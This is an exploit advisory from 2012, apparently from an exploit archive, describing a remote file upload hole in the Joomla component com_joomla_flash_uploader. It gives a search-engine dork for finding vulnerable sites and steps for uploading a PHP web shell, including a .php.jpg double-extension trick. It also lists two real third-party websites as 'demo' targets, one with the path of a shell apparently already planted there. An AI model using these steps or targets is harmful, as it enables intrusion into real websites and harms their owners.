facebook facebook twitter rss

Joomla Component com_joomla_flash_uploader Remote File Upload

Author: Zikou-16 , Published: 27-09-2012
--------------------------------------------------------------
Joomla Component com_joomla_flash_uploader Remote File Upload
-------------------------------------------------------------

Exploit Author => Zikou-16
My Facebook => http://www.facebook.com/ZIkOou.16
-------------------------------------------------------------

Dork => inurl:index.php?option=com_joomla_flash_uploader
-------------------------------------------------------------

So !! xD
First Go to ==> http://localhost/index.php?option=com_joomla_flash_uploader&Itemid=[id]

You Will Find a Flash Uploader

Or Go To http://localhost/administrator/components/com_joomla_flash_uploader/tfu/tfu_210.swf

You Can Upload Your Shell.php or shell.php.jpg

In The Flash Uploader you'll see Your Shell !!

4 example ==> Upload folder: ./images/stories/ ==> Your shell => http://localhost//images/stories/shell.php

Demo ==> http://www.coachforexcellence.co.uk/index.php?option=com_joomla_flash_uploader&Itemid=98
==> http://www.kazulocations.com.au/index.php?option=com_joomla_flash_uploader&Itemid=123
And Shell ==> http://www.kazulocations.com.au//images/stories/propertyupload/500.php.jpg


Greets To All Dz Hacker's

Like us on Facebook :